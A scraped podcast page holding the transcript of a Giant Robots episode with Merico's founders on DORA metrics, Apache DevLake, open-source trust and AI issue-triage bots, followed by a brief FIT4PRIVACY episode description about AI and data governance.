perspectives, particularly on the importance of process over individual metrics in team management. Merico (https://www.merico.dev/) Follow Merico on GitHub (https://github.com/merico-dev), Linkedin (https://www.linkedin.com/company/merico-dev/), or X (https://twitter.com/MericoDev). Apache DevLake (https://devlake.apache.org/) Follow Henry Yin on LinkedIn (https://www.linkedin.com/in/henry-hezheng-yin-88116a52/). Follow Maxim Wheatley on LinkedIn (https://www.linkedin.com/in/maximwheatley/) or X (https://twitter.com/MaximWheatley). Follow thoughtbot on X (https://twitter.com/thoughtbot) or LinkedIn (https://www.linkedin.com/company/150727/). Become a Sponsor (https://thoughtbot.com/sponsorship) of Giant Robots! Transcript: VICTORIA: This is the Giant Robots Smashing Into Other Giant Robots podcast, where we explore the design, development, and business of great products. I'm your host, Victoria Guido. And with me today is Henry Yin, Co-Founder and CTO of Merico, and Maxim Wheatley, the first employee and Community Leader of Merico, creating data-driven developer tools for forward-thinking devs. Thank you for joining us. HENRY: Thanks for having us. MAXIM: Glad to be here, Victoria. Thank you. VICTORIA: And we also have a special guest co-host today, the CTO of thoughtbot, Joe Ferris. JOE: Hello. VICTORIA: Okay. All right. So, I met Henry and Maxim at the 7CTOs Conference in San Diego back in November. And I understand that Henry, you are also an avid rock climber. HENRY: Yes. I know you were also in Vegas during Thanksgiving. And I sort of have [inaudible 00:49] of a tradition to go to Vegas every Thanksgiving to Red Rock National Park. Yeah, I'd love to know more about how was your trip to Vegas this Thanksgiving. VICTORIA: Yes. I got to go to Vegas as well. We had a bit of rain, actually. So, we try not to climb on sandstone after the rain and ended up doing some sport climbing on limestone around the Blue Diamond Valley area; a little bit light on climbing for me, actually, but still beautiful out there. I loved being in Red Rock Canyon outside of Las Vegas. And I do find that there's just a lot of developers and engineers who have an affinity for climbing. I'm not sure what exactly that connection is. But I know, Joe, you also have a little bit of climbing and mountaineering experience, right? JOE: Yeah. I used to climb a good deal. I actually went climbing for the first time in, like, three years this past weekend, and it was truly pathetic. But you have to [laughs] start somewhere. VICTORIA: That's right. And, Henry, how long have you been climbing for? HENRY: For about five years. I like to spend my time in nature when I'm not working: hiking, climbing, skiing, scuba diving, all of the good outdoor activities. VICTORIA: That's great. And I understand you were bouldering in Vegas, right? Did you go to Kraft Boulders? HENRY: Yeah, we went to Kraft also Red Spring. It was a surprise for me. I was able to upgrade my outdoor bouldering grade to B7 this year at Red Spring and Monkey Wrench. There was always some surprises for me. When I went to Red Rock National Park last year, I met Alex Honnold there who was shooting a documentary, and he was really, really friendly. So, really enjoying every Thanksgiving trip to Vegas. VICTORIA: That's awesome. Yeah, well, congratulations on B7. That's great. It's always good to get a new grade. And I'm kind of in the same boat with Joe, where I'm just constantly restarting my climbing career. So [laughs], I haven't had a chance to push a grade like that in a little while. But that sounds like a lot of fun. HENRY: Yeah, it's really hard to be consistent on climbing when you have, like, a full-time job, and then there's so much going on in life. It's always a challenge. VICTORIA: Yeah. But a great way to like, connect with other people, and make friends, and spend time outdoors. So, I still really appreciate it, even if I'm not maybe progressing as much as I could be. That's wonderful. So, tell me, how did you and Maxim actually meet? Did you meet through climbing or the outdoors? MAXIM: We actually met through AngelList, which I really recommend to anyone who's really looking to get into startups. When Henry and I met, Merico was essentially just starting. I had this eagerness to explore something really early stage where I'd get to do all of the interesting kind of cross-functional things that come with that territory, touching on product and marketing, on fundraising, kind of being a bit of everything. And I was eager to look into something that was applying, you know, machine learning, data analytics in some really practical way. And I came across what Hezheng Henry and the team were doing in terms of just extracting useful insights from codebases. And we ended up connecting really well. And I think the previous experience I had was a good fit for the team, and the rest was history. And we've had a great time building together for the last five years. VICTORIA: Yeah. And tell me a little bit more about your background and what you've been bringing to the Merico team. MAXIM: I think, like a lot of people in startups, consider myself a member of the Island of Misfit Toys in the sense that no kind of clear-cut linear pathway through my journey but a really exciting and productive one nonetheless. So, I began studying neuroscience at Georgetown University in Washington, D.C. I was about to go to medical school and, in my high school years had explored entrepreneurship in a really basic way. I think, like many people do, finding ways to monetize my hobbies and really kind of getting infected with that bug that I could create something, make money from it, and kind of be the master of my own destiny, for lack of less cliché terms. So, not long after graduating, I started my first job that recruited me into a seed-stage venture capital, and from there, I had the opportunity to help early-stage startups, invest in them. I was managing a startup accelerator out there. From there, produced a documentary that followed those startups. Not long after all of that, I ended up co-founding a consumer electronics company where I was leading product, so doing lots of mechanical, electrical, and a bit of software engineering. And without taking too long, those were certainly kind of two of the more formative things. But one way or another, I've spent my whole career now in startups and, especially early-stage ones. It was something I was eager to do was kind of take some of the high-level abstract science that I had learned in my undergraduate and kind of apply some of those frameworks to some of the things that I do today. VICTORIA: That's super interesting. And now I'm curious about you, Henry, and your background. And what led you to get the idea for Merico? HENRY: Yeah. My professional career is actually much simpler because Merico was my first company and my first job. Before Merico, I was a PhD student at UC Berkeley studying computer science. My research was an intersection of software engineering and machine learning. And back then, we were tackling this research problem of how do we fairly measure the developer contributions in a software project? And the reason we are interested in this project has to do with the open-source funding problem. So, let's say an open-source project gets 100k donations from Google. How does the maintainers can automatically distribute all of the donations to sometimes hundreds or thousands of contributors according to their varying level of contributions? So, that was the problem we were interested in. We did research on this for about a year. We published a paper. And later on, you know, we started the company with my, you know, co-authors. And that's how the story began for Merico. VICTORIA: I really love that. And maybe you could tell me just a little bit more about what Merico is and why a company may be interested in trying out your services. HENRY: The product we're currently offering actually is a little bit different from what we set out to build. At the very beginning, we were building this platform for open-source funding problem that we can give an open-source project. We can automatically, using algorithm, measure developer contributions and automatically distribute donations to all developers. But then we encountered some technical and business challenges. So, we took out the metrics component from the previous idea and launched this new product in the engineering metric space. And this time, we focus on helping engineering leaders better understand the health of their engineering work. So, this is the Merico analytics platform that we're currently offering to software engineering teams. JOE: It's interesting. I've seen some products that try to judge the health of a codebase, but it sounds like this is more trying to judge the health of the team. MAXIM: Yeah, I think that's generally fair to say. As we've evolved, we've certainly liked to describe ourselves as, you know, I think a lot of people are familiar with observability tools, which help ultimately ascertain, like, the performance of the technology, right? Like, it's assessing, visualizing, chopping up the machine-generated data. And we thought there would be a tremendous amount of value in being, essentially, observability for the human-generated data. And I think, ultimately, what we found on our journey is that there's a tremendous amount of frustration, especially in larger teams, not in looking to use a tool like that for any kind of, like, policing type thing, right? Like, no one's looking if they're doing it right, at least looking to figure out, like, oh, who's underperforming, or who do we need to yell at? But really trying to figure out, like, where are the strengths? Like, how can we improve our processes? How can we make sure we're delivering better software more reliably, more sustainably? Like how are we balancing that trade-off between new features, upgrades and managing tech debt and bugs? We've ultimately just worked tirelessly to, hopefully, fill in those blind spots for people. And so far, I'm pleased to say that the reception has been really positive. We've, I think, tapped into a somewhat subtle but nonetheless really important pain point for a lot of teams around the world. VICTORIA: Yeah. And, Henry, you said that you started it based on some of the research that you did at UC Berkeley. I also understand you leaned on the research from the DevOps research from DORA. Can you tell me a little bit more about that and what you found insightful from the research that was out there and already existed? MAXIM: So, I think what's really funny, and it really speaks to, I think, the importance in product development of just getting out there and speaking with your potential users or actual users, and despite all of the deep, deep research we had done on the topic of understanding engineering, we really hadn't touched on DORA too much. And this is probably going back about five years now. Henry and I were taking a customer meeting with an engineering leader at Yahoo out in the Bay Area. He kind of revealed this to us basically where he's like, "Oh, you guys should really look at incorporating DORA into this thing. Like, all of the metrics, all of the analytics you're building super cool, super interesting, but DORA really has this great framework, and you guys should look into it." And in hindsight, I think we can now [chuckles], honestly, admit to ourselves, even if it maybe was a bit embarrassing at the time where both Henry and I were like, "What? What is that? Like, what's Dora?" And we ended up looking into it and since then, have really become evangelists for the framework. And I'll pass it to Henry to talk about, like, what that journey has looked like. HENRY: Thanks, Maxim. I think what's cool about DORA is in terms of using metrics, there's always this challenge called Goodhart's Law, right? So, whenever a metric becomes a target, the metric cease to be a good metric because people are going to find ways to game the metric. So, I think what's cool about DORA is that it actually offers not just one metric but four key metrics that bring balance to covering both the stability and velocity. So, when you look at DORA metrics, you can't just optimize for velocity and sacrificing your stability. But you have to look at all four metrics at the same time, and that's harder to game. So, I think that's why it's become more and more popular in the industry as the starting point for using metrics for data-driven engineering. VICTORIA: Yeah. And I like how DORA also represents it as the metrics and how they apply to where you are in the lifecycle of your product. So, I'm curious: with Merico, what kind of insights do you think engineering leaders can gain from having this data that will unlock some of their team's potential? MAXIM: So, I think one of the most foundational things before we get into any detailed metrics is I think it's more important than ever, especially given that so many of us are remote, right? Where the general processes of software engineering are generally difficult to understand, right? They're nuanced. They tend to kind of happen in relative isolation until a PR is reviewed and merged. And it can be challenging, of course, to understand what's being done, how consistently, how well, like, where are the good parts, where are the bad parts. And I think that problem gets really exasperated, especially in a remote setting where no one is necessarily in the same place. So, on a foundational level, I think we've really worked hard to solve that challenge, where just being able to see, like, how are we doing? And to that point, I think what we've found before anyone even dives too deep into all of the insights that we can deliver, I think there's a tremendous amount of appetite for anyone who's looking to get into that practice of constant improvement and figuring out how to level up the work they're doing, just setting close benchmarks, figuring out, like, okay, when we talk about more nebulous or maybe subjective terms like speed, or quality, what does good look like? What does consistent look like? Being able to just tie those things to something that really kind of unifies the vocabulary is something I always like to say, where, okay, now, even if we're not focused on a specific metric, or we don't have a really particular goal in mind that we want to assess, now we're at least starting the conversation as a team from a place where when we talk about quality, we have something that's shared between us. We understand what we're referring to. And when we're talking about speed, we can also have something consistent to talk about there. And within all of that, I think one of the most powerful things is it helps to really kind of ground the conversations around the trade-offs, right? There's always that common saying: the triangle of trade-offs is where it's, like, you can have it cheap; you can have it fast, and you can have it good, but you can only have two. And I think with DORA, with all of these different frameworks with many metrics, it helps to really solidify what those trade-offs look like. And that's, for me at least, been one of the most impactful things to watch: is our global users have really started evolving their practices with it. HENRY: Yeah. And I want to add to Maxim's answer. But before that, I just want to quickly mention how our products are structured. So, Merico actually has an open-source component and a proprietary component. So, the open-source component is called Apache DevLake. It's an open-source project we created first within Merico and later on donated to Apache Software Foundation. And now, it's one of the most popular engineering metrics tool out there. And then, on top of that, we built a SaaS offering called DevInsight Cloud, which is powered by Apache DevLake. So, with DevLake, the open-source project, you can set up your data connections, connect DevLake to all of the dev tools you're using, and then we collect data. And then we provide many different flavors of dashboards for our users. And many of those dashboards are structured, and there are different questions engineering teams might want to ask. For example, like, how fast are we responding to our customer requirement? For that question, we will look at like, metrics like change lead time, or, like, for a question, how accurate is our planning for the sprint? In that case, the dashboard will show metrics relating to the percentage of issues we can deliver for every sprint for our plan. So, that's sort of, you know, based on the questions that the team wants to answer, we provide different dashboards that help them extract insights using the data from their DevOps tools. JOE: It's really interesting you donated it to Apache. And I feel like the hybrid SaaS open-source model is really common. And I've become more and more skeptical of it over the years as companies start out open source, and then once they start getting competitors, they change the license. But by donating it to Apache, you sort of sidestep that potential trust issue. MAXIM: Yeah, you've hit the nail on the head with that one because, in many ways, for us, engaging with Apache in the way that we have was, I think, ultimately born out of the observations we had about the shortcomings of other products in the space where, for one, very practical. We realized quickly that if we wanted to offer the most complete visibility possible, it would require connections to so many different products, right? I think anyone can look at their engineering toolchain and identify perhaps 7, 9, 10 different things they're using on a day-to-day basis. Oftentimes, those aren't shared between companies, too. So, I think part one was just figuring out like, okay, how do we build a framework that makes it easy for developers to build a plugin and contribute to the project if there's something they want to incorporate that isn't already supported? And I think that was kind of part one. Part two is, I think, much more important and far more profound, which is developer trust, right? Where we saw so many different products out there that claimed to deliver these insights but really had this kind of black-box approach, right? Where data goes in, something happens, insights come out. How's it doing that? How's it weighting things? What's it calculating? What variables are incorporated? All of that is a mystery. And that really leads to developers, rightfully, not having a basis to trust what's actually being shown to them. So, for us, it was this perspective of what's the maximum amount of transparency that we could possibly offer? Well, open source is probably the best answer to that question. We made sure the entirety of the codebase is something they can take a look at, they can modify. They can dive into the underlying queries and algorithms and how everything is working to gain a total sense of trust in how is this thing working? And if I need to modify something to account for some nuanced details of how our team works, we can also do that. And to your point, you know, I think it's definitely something I would agree with that one of the worst things we see in the open-source community is that companies will be kind of open source in name only, right? Where it's really more of marketing or kind of sales thing than anything, where it's like, oh, let's tap into the good faith of open source. But really, somehow or another, through bait and switch, through partial open source, through license changes, whatever it is, we're open source in name only but really, a proprietary, closed-source product. So, for us, donating the core of DevLake to the Apache Foundation was essentially our way of really, like, putting, you know, walking the talk, right? Where no one can doubt at this point, like, oh, is this thing suddenly going to have the license changed? Is this suddenly going to go closed-source? Like, the answer to that now is a definitive no because it is now part of that ecosystem. And I think with the aspirations we've had to build something that is not just a tool but, hopefully, long-term becomes, like, foundational technology, I think that gives people confidence and faith that this is something they can really invest in. They can really plumb into their processes in a deep and meaningful way with no concerns whatsoever that something is suddenly going to change that makes all of that work, you know, something that they didn't expect. JOE: I think a lot of companies guard their source code like it's their secret sauce, but my experience has been more that it's the secret shame [laughs]. HENRY: [laughs] MAXIM: There's no doubt in my role with, especially our open-source product driving our community we've really seen the magic of what a community-driven product can be. And open source, I think, is the most kind of a true expression of a community-driven product, where we have a Slack community with nearly 1,000 developers in it now. Naturally, right? Some of those developers are in there just to ask questions and answer questions. Some are intensely involved, right? They're suggesting improvements. They're suggesting new features. They're finding ways to refine things. And it really is that, like, fantastic culture that I'm really proud that we've cultivated where best idea ships, right? If you've got a good idea, throw it into a GitHub issue or a comment. Let's see how the community responds to it. Let's see if someone wants to pick it up. Let's see if someone wants to submit a PR. If it's good, it goes into production, and then the entire community benefits. And, for me, that's something I've found endlessly exciting. HENRY: Yeah. I think Joe made a really good point on the secret sauce part because I don't think the source code is our secret sauce. There's no rocket science in DevLake. If we break it down, it's really just some UI UX plus data pipelines. I think what's making DevLake successful is really the trust and collaboration that we're building with the open-source community. When it comes to trust, I think there are two aspects. First of all, trust on the metric accuracy, right? Because with a lot of proprietary software, you don't know how they are calculating the metrics. If people don't know how the metrics are calculated, they can't really trust it and use it. And secondly, is the trust that they can always use this software, and there's no vendor lock-in. And when it comes to collaboration, we were seeing many of our data sources and dashboards they were contributed not by our core developers but by the community. And the communities really, you know, bring in their insights and their use cases into DevLake and make DevLake, you know, more successful and more applicable to more teams in different areas of soft engineering. MID-ROLL AD: Are you an entrepreneur or start-up founder looking to gain confidence in the way forward for your idea? At thoughtbot, we know you're tight on time and investment, which is why we've created targeted 1-hour remote workshops to help you develop a concrete plan for your product's next steps. Over four interactive sessions, we work with you on research, product design sprint, critical path, and presentation prep so that you and your team are better equipped with the skills and knowledge for success. Find out how we can help you move the needle at tbot.io/entrepreneurs. VICTORIA: I understand you've taken some innovative approaches on using AI in your open-source repositories to respond to issues and questions from your developers. So, can you tell me a little bit more about that? HENRY: Absolutely. I self-identify as a builder. And one characteristic of builder is to always chase after the dream of building infinite things within the finite lifespan. So, I was always thinking about how we can be more productive, how we can, you know, get better at getting better. And so, this year, you know, AI is huge, and there are so many AI-powered tools that can help us achieve more in terms of delivering software. And then, internally, we had a hackathon, and there's one project, which is an AI-powered coding assistant coming out of it called DevChat. And we have made it public at devchat.ai. But we've been closely following, you know, what are the other AI-powered tools that can make, you know, software developers' or open-source maintainers' lives easier? And we've been observing that there are more and more open-source projects adopting AI chatbots to help them handle, you know, respond to GitHub issues. So, I recently did a case study on a pretty popular open-source project called LangChain. So, it's the hot kid right now in the AI space right now. And it's using a chatbot called Dosu to help respond to issues. I had some interesting findings from the case study. VICTORIA: In what ways was that chatbot really helpful, and in what ways did it not really work that well? HENRY: Yeah, I was thinking of how to measure the effectiveness of that chatbot. And I realized that there is a feature that's built in GitHub, which is the reaction to comment. So, how the chatbot works is whenever there is a new issue, the chatbot would basically retrieval-augmented generation pipeline and then using ORM to generate a response to the issue. And then there's people leave reactions to that comment by the chatbot, but mostly, it's thumbs up and thumbs down. So, what I did is I collect all of the issues from the LangChain repository and look at how many thumbs up and thumbs down Dosu chatbot got, you know, from all of the comments they left with the issues. So, what I found is that over across 2,600 issues that Dosu chatbot helped with, it got around 900 thumbs ups and 1,300 thumbs down. So, then it comes to how do we interpret this data, right? Because it got more thumbs down than thumbs up doesn't mean that it's actually not useful or harmful to the developers. So, to answer that question, I actually looked at some examples of thumbs-up and thumb-down comments. And what I found is the thumb down doesn't mean that the chatbot is harmful. It's mostly the developers are signaling to the open-source maintainers that your chatbot is not helping in this case, and we need human intervention. But with the thumbs up, the chatbot is actually helping a lot. There's one issue where people post a question, and the chatbot just wrote the code and then basically made a suggestion on how to resolve the issue. And the human response is, "Damn, it worked." And that was very surprising to me, and it made me consider, you know, adopting similar technology and AI-powered tools for our own open-source project. VICTORIA: That's very cool. Well, I want to go back to the beginning of Merico. And when you first got started, and you were trying to understand your customers and what they need, was there anything surprising in that early discovery process that made you change your strategy? HENRY: So, one challenge we faced when we first explored open-source funding allocation problem space is that our algorithm looks at the Git repository. But with software engineering, especially with open-source collaboration, there are so many activities that are happening outside of open-source repos on GitHub. For example, I might be an evangelist, and my day-to-day work might be, you know, engaging in community work, talking about the open-source project conference. And all of those things were not captured by our algorithm, which was only looking at the GitHub repository at the time. So, that was one of the technical challenge that we faced and led us to switch over to more of the system-driven metrics side. VICTORIA: Gotcha. Over the years, how has Merico grown? What has changed between when you first started and today? HENRY: So, one thing is the team size. When we just got started, we only have, you know, the three co-founders and Maxim. And now we have grown to a team of 70 team members, and we have a fully distributed team across multiple continents. So, that's pretty interesting dynamics to handle. And we learned a lot of how to build effective team and a cohesive team along the way. And in terms of product, DevLake now, you know, has more than 900 developers in our Slack community, and we track over 360 companies using DevLake. So, definitely, went a long way since we started the journey. And yeah, tomorrow we...actually, Maxim and I are going to host our end-of-year Apache DevLake Community Meetup and featuring Nathen Harvey, the Google's DORA team lead. Yeah, definitely made some progress since we've been working on Merico for four years. VICTORIA: Well, that's exciting. Well, say hi to Nathen for me. I helped takeover DevOps DC with some of the other organizers that he was running way back in the day, so [laughs] that's great. What challenges do you see on the horizon for Merico and DevLake? MAXIM: One of the challenges I think about a lot, and I think it's front of mind for many people, especially with software engineering, but at this point, nearly every profession, is what does AI mean for everything we're doing? What does the future look like where developers are maybe producing the majority of their code through prompt-based approaches versus code-based approaches, right? How do we start thinking about how we coherently assess that? Like, how do you maybe redefine what the value is when there's a scenario where perhaps all coders, you know, if we maybe fast forward a few years, like, what if the AI is so good that the code is essentially perfect? What does success look like then? How do you start thinking about what is a good team if everyone is shooting out 9 out of 10 PRs nearly every time because they're all using a unified framework supported by AI? So, I think that's certainly kind of one of the challenges I envision in the future. I think, really, practically, too, many startups have been contending with the macroclimate within the fundraising climates. You know, I think many of the companies out there, us included, had better conditions in 2019, 2020 to raise funds at more favorable valuations, perhaps more relaxed terms, given the climate of the public markets and, you know, monetary policy. I think that's, obviously, we're all experiencing and has tightened things up like revenue expectations or now higher kind of expectations on getting into a highly profitable place or, you know, the benchmark is set a lot higher there. So, I think it's not a challenge that's unique to us in any way at all. I think it's true for almost every company that's out there. It's now kind of thinking in a more disciplined way about how do you kind of meet the market demands without compromising on the product vision and without compromising on the roadmap and the strategies that you've put in place that are working but are maybe coming under a little bit more pressure, given kind of the new set of rules that have been laid out for all of us? VICTORIA: Yeah, that is going to be a challenge. And do you see the company and the product solving some of those challenges in a unique way? HENRY: I've been thinking about how AI can fulfill the promise of making developers 10x developer. I'm an early adopter and big fan of GitHub Copilot. I think it really helps with writing, like, the boilerplate code. But I think it's improving maybe my productivity by 20% to 30%. It's still pretty far away from 10x. So, I'm thinking how Merico's solutions can help fill the gap a little bit. In terms of Apache DevLake and its SaaS offering, I think we are helping with, like, the team collaboration and measuring, like, software delivery performance, how can the team improve as a whole. And then, recently, we had a spin-off, which is the AI-powered coding assistant DevChat. And that's sort of more on the empowering individual developers with, like, testing, refactoring these common workflows. And one big thing for us in the future is how we can combine these two components, you know, team collaboration and improvement tool, DevLake, with the individual coding assistant, DevChat, how they can be integrated together to empower developers. I think that's the big question for Merico ahead. JOE: Have you used Merico to judge the contributions of AI to a project? HENRY: [laughs] So, actually, after we pivot to engineering metrics, we focus now less on individual contribution because that sometimes can be counterproductive. Because whenever you visualize that, then people will sometimes become defensive and try to optimize for the metrics that measure individual contributions. So, we sort of...nowadays, we no longer offer that kind of metrics within DevLake, if that makes sense. MAXIM: And that kind of goes back to one of Victoria's earlier questions about, like, what surprised us in the journey. Early on, we had this very benevolent perspective, you know, I would want to kind of underline that, that we never sought to be judging individuals in a negative way. We were looking to find ways to make it useful, even to a point of finding ways...like, we explored different ways to give developers badges and different kind of accomplishment milestones, like, things to kind of signal their strengths and accomplishments. But I think what we've found in that journey is that...and I would really kind of say this strongly. I think the only way that metrics of any kind serve an organization is when they support a healthy culture. And to that end, what we found is that we always like to preach, like, it's processes, not people. It's figuring out if you're hiring correctly, if you're making smart decisions about who's on the team. I think you have to operate with a default assumption within reason that those people are doing their best work. They're trying to move the company forward. They're trying to make good decisions to better serve the customers, better serve the company and the product. With that in mind, what you're really looking to do is figure out what is happening within the underlying processes that get something from thought to production. And how do you clear the way for people? And I think that's really been a big kind of, you know, almost like a tectonic shift for our company over the years is really kind of fully transitioning to that. And I think, in some ways, DORA has represented kind of almost, like, a best practice for, like, processes over people, right? It's figuring out between quality and speed; how are you doing? Where are those trade-offs? And then, within the processes that account for those outcomes, how can you really be improving things? So, I would say, for us, that's, like, been kind of the number one thing there is figuring out, like, how do we keep doubling down on processes, not people? And how do we really make sure that we're not just telling people that we're on their side and we're taking a, you know, a very humanistic perspective on wanting to improve the lives of people but actually doing it with the product? HENRY: But putting the challenge on measuring individual contributions aside, I'm as curious as Joe about AI's role in software engineering. I expect to see more and more involvement of AI and gradually, you know, replacing low-level and medium-level and, in the future, even high-level tasks for humans so we can just focus on, like, the objective instead of the implementation. VICTORIA: I can imagine, especially if you're starting to integrate AI tools into your systems and if you're growing your company at scale, some of the ability to have a natural intuition about what's going on it really becomes a challenge, and the data that you can derive from some of these products could help you make better decisions and all different types of things. So, I'm kind of curious to hear from Joe; with your history of open-source contribution and being a part of many different development teams, what kind of information do you wish that you had to help you make decisions in your role? JOE: Yeah, that's an interesting question. I've used some tools that try to identify problem spots in the code. But it'd be interesting to see the results of tools that analyze problem spots in the process. Like, I'd like to learn more about how that works. HENRY: I'm curious; one question for Joe. What is your favorite non-AI-powered code scanning tool that you find useful for yourself or for your team? JOE: I think the most common static analysis tool I use is something to find the Git churn in a repository. Some of this probably is because I've worked mostly on projects these days with dynamic languages. So, there's kind of a limit to how much static analysis you can do of, you know, a Ruby or a Python codebase. But just by analyzing which parts of the application changed the most, help you find which parts are likely to be the buggiest and the most complex. I think every application tends to involve some central model. Like, if you're making an e-commerce site, then probably products are going to have a lot of the core logic, purchases will have a lot of the core logic. And identifying those centers of gravity just through the Git statistics has helped me find places that need to be reworked. HENRY: That's really interesting. Is it something like a hotspot analysis? And when you find a hotspot, then would you invest more resources in, like, refactoring the hotspot to make it more maintainable? JOE: Right, exactly. Like, you can use the statistics to see which files you should look at. And then, usually, when you actually go into the files, especially if you look at some of the changes to the files, it's pretty clear that it's become, you know, for example, a class has become too large, something has become too tightly coupled. HENRY: Gotcha. VICTORIA: Yeah. And so, if you could go back in time, five years ago and give yourself some advice when you first started along this journey, what advice would you give yourself? MAXIM: I'll answer the question in two ways: first for the company and then for myself personally. I think for the company, what I would say is, especially when you're in that kind of pre-product market fit space, and you're maybe struggling to figure out how to solve a challenge that really matters, I think you need to really think carefully about, like, how would you yourself be using your product? And if you're finding reasons, you wouldn't, like, really, really pay careful attention to those. And I think, for us, like, early on in our journey, we ultimately kind of found ourselves asking, we're like, okay, we're a smaller earlier stage team. Perhaps, like, small improvements in productivity or quality aren't going to necessarily move the needle. That's one of the reasons maybe we're not using this. Maybe our developers are already at bandwidth. So, it's not a question of unlocking more bandwidth or figuring out where there's kind of weak points or bottlenecks at that level, but maybe how can we dial in our own processes to let the whole team function more effectively. And I think, for us, like, the more we started thinking through that lens of, like, what's useful to us, like, what's solving a pain point for us, I think, in many ways, DevLake was born out of that exact thinking. And now DevLake is used by hundreds of companies around the world and has, you know, this near thousand developer community that supports it. And I think that's testament to the power of that. For me, personally, if I were to kind of go back five years, you know, I'm grateful to say there isn't a whole lot I would necessarily change. But I think if there's anything that I would, it would just to be consistently more brave in sharing ideas, right? I think Merico has done a great job, and it's something I'm so proud of for us as a team of really embracing new ideas and really kind of making sure, like, best idea ships, right? There isn't a title. There isn't a level of seniority that determines whether or not someone has a right to suggest something or improve something. And I think with that in mind, for me as a technical person but not a member of technical staff, so to speak, I think there was many occasions, for me personally, where I felt like, okay, maybe because of that, I shouldn't necessarily weigh in on certain things. And I think what I've found, and it's a trust-building thing as well, is, like, even if you're wrong, even if your suggestion may be misunderstands something or isn't quite on target, there's still a tremendous amount of value in just being able to share a perspective and share a recommendation and push it out there. And I think with that in mind, like, it's something I would encourage myself and encourage everybody else in a healthy company to feel comfortable to just keep sharing because, ultimately, it's an accuracy-by-volume game to a certain degree, right? Where if I come up with one idea, then I've got one swing at the bat. But if us as a collective come up with 100 ideas that we consider intelligently, we've got a much higher chance of maybe a handful of those really pushing us forward. So, for me, that would be advice I would give myself and to anybody else. HENRY: I'll follow the same structure, so I'll start by the advice in terms of company and advice to myself as an individual. So, for a company level, I think my advice would be fail fast because every company needs to go through this exploration phase trying to find their product-market fit, and then they will have to test, you know, a couple of ideas before they find the right fit for themselves, the same for us. And I wish that we actually had more in terms of structure in exploring these ideas and set deadlines, you know, set milestones for us to quickly test and filter out bad ideas and then accelerate the exploration process. So, fail fast would be my suggestion at the company level. From an individual level, I would say it's more adapting to my CTO role because when I started the company, I still had that, you know, graduate student hustle mindset. I love writing code myself. And it's okay if I spent 100% of my time writing code when the company was, you know, at five people, right? But it's not okay [chuckles] when we have, you know, a team of 40 engineers. So, I wish I had that realization earlier, and I transitioned to a real CTO role earlier, focusing more, like, on technical evangelism or building out the technical and non-technical infrastructure to help my engineering teams be successful. VICTORIA: Well, I really appreciate that. And is there anything else that you all would like to promote today? HENRY: So if you're, you know, engineering leaders who are looking to measure, you know, some metrics and adopt a more data-driven approach to improving your software delivery performance, check out Apache DevLake. It's open-source project, free to use, and it has some great dashboards, support, various data resources. And join our community. We have a pretty vibrant community on Slack. And there are a lot of developers and engineering leaders discussing how they can get more value out of data and metrics and improve software delivery performance. MAXIM: Yeah. And I think to add to that, something I think we've found consistently is there's plenty of data skeptics out there, rightfully so. I think a lot of analytics of every kind are really not very good, right? And so, I think people are rightfully frustrated or even traumatized by them. And for the data skeptics out there, I would invite them to dive into the DevLake community and pose your challenges, right? If you think this stuff doesn't make sense or you have concerns about it, come join the conversation because I think that's really where the most productive discussions end up coming from is not from people mutually high-fiving each other for a successful implementation of DORA. But the really exciting moments come from the people in the community who are challenging it and saying like, "You know what? Like, here's where I don't necessarily think something is useful or I think could be improved." And it's something that's not up to us as individuals to either bless or to deny. That's where the community gets really exciting is those discussions. So, I would say, if you're a data skeptic, come and dive in, and so long as you're respectful, challenge it. And by doing so, you'll hopefully not only help yourself but really help everybody, which is what I love about this stuff so much. JOE: I'm curious, does Merico use Merico? HENRY: Yes. We've been dogfooding ourself a lot. And a lot of the product improvement ideas actually come from our own dogfooding process. For example, there was one time that we look at a dashboard that has this issue change lead time. And then we found our issue, change lead time, you know, went up in the past few month. And then, we were trying to interpret whether that's a good thing or a bad thing because just looking at a single metric doesn't tell us the story behind the change in the metrics. So, we actually improved the dashboard to include some, you know, covariates of the metrics, some other related metrics to help explain the trend of the metric. So yeah, dogfooding is always useful in improving product. VICTORIA: That's great. Well, thank you all so much for joining. I really enjoyed our conversation. You can subscribe to the show and find notes along with a complete transcript for this episode at giantrobots.fm. If you have questions or comments, email us at hosts@giantrobots.fm. And you can find me on Twitter @victori_ousg. This podcast is brought to you by thoughtbot and produced and edited by Mandy Moore. Thanks for listening. See you next time.

The FIT4PRIVACY Podcast - For those who care about privacy
How can organizations seize the AI opportunity with Balaji Ganesan and Punit Bhatia in The FIT4Privacy Podcast E103

The FIT4PRIVACY Podcast - For those who care about privacy

Play Episode Listen Later Jan 4, 2024 32:55


AI is a huge opportunity for businesses. How can organizations seize this opportunity? Well by understanding how AI works, its opportunities and drawbacks, responsible AI and data security. This is exactly what our guest Balaji Ganesan, Co-Founder and CEO of Privacera and our host Punit Bhatia, CEO of FIT4Privacy are talking about in this episode. Take a listen now.  KEY CONVERSATION POINTS  AI in one word  How can businesses combine data governance and AI?  How can companies start AI programs   Responsible AI framework and policies  Data governance and data security  Closing    ABOUT THE GUEST  Balaji Ganesan is CEO and co-founder of Privacera. Before Privacera, Balaji and Privacera co-founder Don Bosco Durai, also founded XA Secure. XA Secure's was acquired by Hortonworks, who contributed the product to the Apache Software Foundation and rebranded as Apache Ranger. Apache Ranger is now deployed in thousands of companies around the world, managing petabytes of data in Hadoop environments. Privacera's product is built on the foundation of Apache Ranger and provides a single pane of glass for securing sensitive data across on-prem and multiple cloud services such as AWS, Azure, Databricks, GCP, Snowflake, and Starburst and more.  ABOUT THE HOST  Punit Bhatia is one of the leading privacy experts who works independently and has worked with professionals in over 30 countries. Punit works with business and privacy leaders to create an organization culture with high AI & privacy awareness and compliance as a business priority by creating and implementing a AI & privacy strategy and policy.   Punit is the author of books “Be Ready for GDPR” which was rated as the best GDPR Book, “AI & Privacy – How to Find Balance”, “Intro To GDPR”, and “Be an Effective DPO”. Punit is a global speaker who has spoken at over 50 global events. Punit is the creator and host of the FIT4PRIVACY Podcast. This podcast has been featured amongst top GDPR and privacy podcasts.  As a person, Punit is an avid thinker and believes in thinking, believing, and acting in line with one's value to have joy in life. He has developed the philosophy named ‘ABC for joy of life' which passionately shares. Punit is based out of Belgium, the heart of Europe.     RESOURCES  Websites www.fit4privacy.com , www.punitbhatia.com,  www.privacera.com   Podcast https://www.fit4privacy.com/podcast Blog https://www.fit4privacy.com/blog YouTube http://youtube.com/fit4privacy  --- Send in a voice message: https://podcasters.spotify.com/pod/show/fit4privacy/message

Dinis Guarda citiesabc openbusinesscouncil Thought Leadership Interviews
